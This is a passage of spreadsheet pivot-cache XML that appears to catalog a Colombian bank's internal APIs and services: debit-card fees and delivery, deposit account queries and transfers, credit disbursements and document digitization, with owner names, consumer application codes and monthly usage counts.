    <s v="La Api Debit Card Cost - permite llevar a cabo las siguientes funcionalidades.   - API que permite consultar los costos de la couta de manejo de una tarjeta débito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <m/>
    <s v="ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ RCAMPODEBITCARDDESIGN_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="812"/>
    <n v="5734"/>
    <n v="1540"/>
    <n v="2081"/>
    <n v="15679"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-03-02T16:46:06"/>
    <s v="Debit Card Design"/>
    <n v="101"/>
    <s v="Debit Card Design - Fares"/>
    <n v="101"/>
    <x v="169"/>
    <s v="Esta api cuenta con la capacidad de exponer datos de consulta relacionados con la cuota de manejo y tarifas asociadas a la Tarjeta débito"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <s v="ConsultaDeTarifasTarjetasDebito/V1.0"/>
    <m/>
    <s v="GESTION DE PRECIOS_NU0091001 _x000d__x000a_ ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ RCAMPODEBITCARDDESIGN_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="257824"/>
    <n v="232178"/>
    <n v="197494"/>
    <n v="155211"/>
    <n v="158834"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-04T21:41:22"/>
    <s v="Debit Card"/>
    <n v="1115"/>
    <s v="Debit Cards - Delivery"/>
    <n v="105"/>
    <x v="170"/>
    <s v="La Api Debit Cards - Delivery - permite llevar a cabo las siguientes funcionalidades.   - Api que permite al cliente ingresar su información de contactabilidad, para que le sea entregado un medio de pago en su domicilio por medio de un operador logí­stico."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ RCAMPODEBITCARDDESIGN_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="24196"/>
    <n v="22051"/>
    <n v="22952"/>
    <n v="19328"/>
    <n v="22712"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-08T08:28:36"/>
    <s v="Debit Cards"/>
    <n v="102"/>
    <s v="Debit Cards - Notify"/>
    <n v="102"/>
    <x v="171"/>
    <s v="Esta api permite llevar a cabo las siguientes funcionalidades: - Informe de Entrega, Permite al proveedor informar el estado final de la entrega de las tarjetas debito en el domicilio de los clientes."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <s v="NotificacionEntregaProductoDebito/V1.0"/>
    <m/>
    <s v="Domina _x000d__x000a_ MonitoreoDCM_AAA"/>
    <n v="31557"/>
    <n v="379090"/>
    <n v="220842"/>
    <n v="676274"/>
    <n v="710873"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-04-11T14:19:21"/>
    <s v="Deposits"/>
    <n v="110"/>
    <s v="Deposit - Account Information"/>
    <n v="110"/>
    <x v="172"/>
    <s v="Esta API permite realizar la consulta de la información de una cuenta de ahorro o corriente, obteniendo la información básica o detallada en filiales del exterior"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasDepositos/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo"/>
    <n v="4113"/>
    <n v="2526"/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-04-28T22:08:36"/>
    <s v="Deposits"/>
    <n v="231"/>
    <s v="Deposit - Account Information"/>
    <n v="120"/>
    <x v="172"/>
    <s v="Esta API permite realizar la consulta de la información de una cuenta de ahorro o corriente, obteniendo la información básica o detallada en filiales del exterior"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaSaldosCuentasDepositos/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="31036"/>
    <n v="31787"/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-04-28T22:08:36"/>
    <s v="Deposits"/>
    <n v="310"/>
    <s v="Deposit - Account Information"/>
    <n v="200"/>
    <x v="172"/>
    <s v="Esta API permite realizar la consulta de la información de una cuenta de ahorro o corriente, obteniendo la información básica o detallada en filiales del exterior"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaSaldosCuentasDepositos/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-04-11T14:19:21"/>
    <s v="Deposits"/>
    <n v="110"/>
    <s v="Deposit - Account Transactions"/>
    <n v="110"/>
    <x v="173"/>
    <s v="Esta API permite listar la información de los movimientos de las cuentas de ahorro/corriente principal del cliente"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasDepositos/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-06-02T21:07:31"/>
    <s v="Deposits"/>
    <n v="231"/>
    <s v="Deposit - Account Transactions"/>
    <n v="201"/>
    <x v="173"/>
    <s v="Esta API permite listar la información de los movimientos de las cuentas de ahorro/corriente principal del cliente"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasDepositos/V2.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="3051"/>
    <n v="405"/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-06-02T21:07:31"/>
    <s v="Deposits"/>
    <n v="310"/>
    <s v="Deposit - Account Transactions"/>
    <n v="310"/>
    <x v="173"/>
    <s v="Esta API permite listar la información de los movimientos de las cuentas de ahorro/corriente principal del cliente"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasDepositos/V2.0"/>
    <m/>
    <s v="TMP1 johucorr_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-04-11T14:19:21"/>
    <s v="Deposits"/>
    <n v="110"/>
    <s v="Deposit - Account Transfers"/>
    <n v="110"/>
    <x v="174"/>
    <s v="Permite realizar transferencias internas y externas de cuentas depósito"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="TransferenciasDeFondos/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-06-02T21:07:31"/>
    <s v="Deposits"/>
    <n v="231"/>
    <s v="Deposit - Account Transfers"/>
    <n v="211"/>
    <x v="174"/>
    <s v="Permite realizar transferencias internas y externas de cuentas depósito"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="TransferenciasDeFondos/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="445"/>
    <n v="515"/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-06-02T21:07:31"/>
    <s v="Deposits"/>
    <n v="310"/>
    <s v="Deposit - Account Transfers"/>
    <n v="220"/>
    <x v="174"/>
    <s v="Permite realizar transferencias internas y externas de cuentas depósito"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="TransferenciasDeFondos/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-04-11T14:19:21"/>
    <s v="Deposits"/>
    <n v="110"/>
    <s v="Deposit - Fixed Information"/>
    <n v="110"/>
    <x v="175"/>
    <s v="Esta API permite consultar la informacion detallada de una cuenta de plazos fijos en filiales del exterior"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasPlazosFijos/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo"/>
    <n v="2358"/>
    <n v="953"/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-04-28T22:08:36"/>
    <s v="Deposits"/>
    <n v="231"/>
    <s v="Deposit - Fixed Information"/>
    <n v="120"/>
    <x v="175"/>
    <s v="Esta API permite consultar la informacion detallada de una cuenta de plazos fijos en filiales del exterior"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasPlazosFijos/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-04-28T22:08:36"/>
    <s v="Deposits"/>
    <n v="310"/>
    <s v="Deposit - Fixed Information"/>
    <n v="200"/>
    <x v="175"/>
    <s v="Esta API permite consultar la informacion detallada de una cuenta de plazos fijos en filiales del exterior"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasPlazosFijos/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-04-11T14:19:21"/>
    <s v="Deposits"/>
    <n v="110"/>
    <s v="Deposit - Fixed Transactions"/>
    <n v="110"/>
    <x v="176"/>
    <s v="Esta API permite a los consumidores, consultar la información de los movimientos de las cuentas de plazos fijos"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasPlazosFijos/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo"/>
    <n v="1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-04-11T14:19:21"/>
    <s v="Deposits"/>
    <n v="231"/>
    <s v="Deposit - Fixed Transactions"/>
    <n v="110"/>
    <x v="176"/>
    <s v="Esta API permite a los consumidores, consultar la información de los movimientos de las cuentas de plazos fijos"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasPlazosFijos/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-04-11T14:19:21"/>
    <s v="Deposits"/>
    <n v="310"/>
    <s v="Deposit - Fixed Transactions"/>
    <n v="110"/>
    <x v="176"/>
    <s v="Esta API permite a los consumidores, consultar la información de los movimientos de las cuentas de plazos fijos"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasPlazosFijos/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW0360010"/>
    <n v="1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-10-01T16:26:15"/>
    <s v="Deposit Account"/>
    <n v="103"/>
    <s v="Deposit Account - Transfers"/>
    <n v="103"/>
    <x v="174"/>
    <s v="El API  permitirá realizar las operaciones de transacciones monetarias de las Cuentas de Ahorro/Corrientes de un cliente Bancolombia y cuenta con las siguientes operaciones: -_x0009_acreditarCuenta -_x0009_debitarCuenta -_x0009_anularCredito -_x0009_anular Débito -_x0009_transferirFondosEntreCuentas -_x0009_anularTransferenciaFondosEntreCuenta"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <s v="AfectacionMonetariaDepositos/V1.0"/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="Recargas_AW1300001 _x000d__x000a_ Transfiya_NU0017001 _x000d__x000a_ CDT_AW1078001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="735631"/>
    <n v="669335"/>
    <n v="665532"/>
    <n v="594540"/>
    <n v="744336"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-12-15T14:46:45"/>
    <s v="Deposit File Processing"/>
    <n v="102"/>
    <s v="Deposit File Processing - Notification"/>
    <n v="102"/>
    <x v="177"/>
    <s v="Esta API permite a los diferentes sistemas de Bancolombia, enviar un mensaje de notificación al aplicativo Finacle Recaudos de que se le ha dejado en un FileSystem un archivo para que lo pueda procesar, realizando la notificación a una aplicación que se le ha dejado un archivo de lotes en una ruta especificada, con el fin de que la aplicación lo tome y lo procese."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <s v="ProcesamientoArchivosDepositos/V1.0"/>
    <m/>
    <s v="PODEM01_NU0001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="901"/>
    <n v="815"/>
    <n v="721"/>
    <n v="703"/>
    <n v="3070"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-12-15T14:46:45"/>
    <s v="Deposit File Processing"/>
    <n v="102"/>
    <s v="Deposit Files Processing - Permission"/>
    <n v="102"/>
    <x v="178"/>
    <s v="Esta API permite a los diferentes sistemas de Bancolombia solicitar que se autorice a un perfil de usuario sobre un archivo existente en una ruta ifs del iSeries."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Transversales iSeries"/>
    <x v="27"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="SolicitudDeAutorizacion/V1.0"/>
    <m/>
    <s v="PODEM01_NU0001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="901"/>
    <n v="810"/>
    <n v="724"/>
    <n v="720"/>
    <n v="3027"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-23T14:55:54"/>
    <s v="Deposits Design"/>
    <n v="131"/>
    <s v="Deposits Design - Catalogs"/>
    <n v="132"/>
    <x v="179"/>
    <s v="habilita la consulta de los catálogos pertenecientes a depósitos. permitirá a los consumidores consultar datos de referencia que se comportan como catálogos."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="ConsultaCatalogosDepositos/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ APP_PRODUCTORCONSUMIDOR"/>
    <n v="2987"/>
    <n v="2788"/>
    <n v="2427"/>
    <n v="2126"/>
    <n v="2389"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Desembolso Credito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="capacidad que permiten la creación de obligaciones crediticias y diversas formas de disponibilidad de sus recursos."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_NU0102001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Desembolso Credito A La Mano"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite realizar la creación de la obligación en el sistema Bankvision e inmediatamente después acreditar la cuenta del cliente."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="ELIBOM _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Desembolso Credito Consumo"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite realizar el desembolso de un crédito de consumo otorgado a una persona natural, creando la obligación en el sistema de créditos de Bankvision y realizando el abono de dinero a la cuenta especificada para el cliente."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW0937 _x000d__x000a_ELIBOM _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Desembolso Credito Consumo"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio DesembolsoCreditoConsumo permite realizar el desembolso de un crédito de consumo otorgado a una persona natural, creando la obligación en el sistema de créditos de Bankvision y realizando el abono de dinero a la cuenta especificada para el cliente._x000a_Aunque el servicio desde el punto de vista del proveedor (STI – Bankvision) esté desarrollado para permitir desembolsar cualquier tipo de crédito, en el presente servicio se acotará únicamente a los campos necesarios para realizar el desembolso de un crédito de consumo. Este servicio adoptará a nivel de desarrollo la nueva funcionalidad creada en bróker (ConsumerMediatorSTI) para habilitar rápidamente consumos sin necesidad de hacer un desarrollo completo._x000a_"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW1285001 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Desembolso Credito Consumo"/>
    <n v="300"/>
    <x v="0"/>
    <s v="El servicio permite realizar el desembolso de un crédito de consumo otorgado a una persona natural, creando la obligación en el sistema de créditos de Bankvision y realizando el abono de dinero a la cuenta especificada para el cliente."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="NU0102001 _x000d__x000a_ELIBOM _x000d__x000a_AW1285001 _x000d__x000a_AW0856 _x000d__x000a_AW1313 _x000d__x000a_AW0955 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-02T15:17:21"/>
    <s v="Digital Document"/>
    <n v="100"/>
    <s v="Digital Document - Documents"/>
    <n v="100"/>
    <x v="180"/>
    <s v="Esta API permite a los consumidores que tienen limitantes para consumir directamente la API de contribución documental realizar la generación y firma de documentos a través de un componente de cadena"/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001"/>
    <n v="2983"/>
    <n v="2789"/>
    <n v="2430"/>
    <n v="2124"/>
    <n v="2633"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Digitalizacion De Documentos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio DigitalizacionDeDocumentos, es una funcionalidad que expone el aplicativo de Servicios de Información Digital KOFAX para el procesamiento de un documento representado en forma digital bajo codificación base64"/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="_x000a__x000a_KOFAX – Herramienta de captura_AW1108001"/>
    <s v="AW1011 _x000d__x000a_AW1203001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Digitalizacion De Documentos"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio DigitalizacionDeDocumentos, es una funcionalidad que expone el aplicativo de Servicios de Información Digital KOFAX para el procesamiento de un documento representado en forma digital bajo codificación base64"/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="_x000a__x000a_KOFAX – Herramienta de captura_AW1108001"/>
    <s v="AW0638 _x000d__x000a_AW1011 _x000d__x000a_NU0034001 _x000d__x000a_AW1203001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-25T17:41:11"/>
    <s v="Consumer Loan Sufi"/>
    <n v="111"/>
    <s v="Disbursement"/>
    <n v="100"/>
    <x v="181"/>
    <s v="Esta API permitirá acceder a las operaciones relacionadas con el desembolso de una obligación, acción que se ejecuta luego de un estudio de crédito para cualquier tipo de producto de Sufi"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="Wompi_NU0093001 _x000d__x000a_ DesembolsosSufi_AW1097001 _x000d__x000a_ BotonRecaudoWompi_NU0093001"/>
    <n v="47853"/>
    <n v="18156"/>
    <n v="21457"/>
    <n v="26856"/>
    <n v="30200"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-19T15:10:59"/>
    <s v="Consumer Loan Sufi"/>
    <n v="201"/>
    <s v="Disbursement"/>
    <n v="200"/>
    <x v="181"/>
    <s v="Esta API permitirá acceder a las operaciones relacionadas con el desembolso de una obligación, acción que se ejecuta luego de un estudio de crédito para cualquier tipo de producto de Sufi"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="AW1097001 _x000d__x000a_ NU0093001 _x000d__x000a_ DesembolsosSufi_AW1097001 _x000d__x000a_ Monitoreo_AW1097001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="47853"/>
    <n v="18156"/>
    <n v="21457"/>
    <n v="26856"/>
    <n v="30200"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Disponibilidad Divisas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Disponibilidad Divisas tiene como objetivo realizar funcionalidades para la verificación de si es un horario hábil o no para la compra y venta de divisas en CIB."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
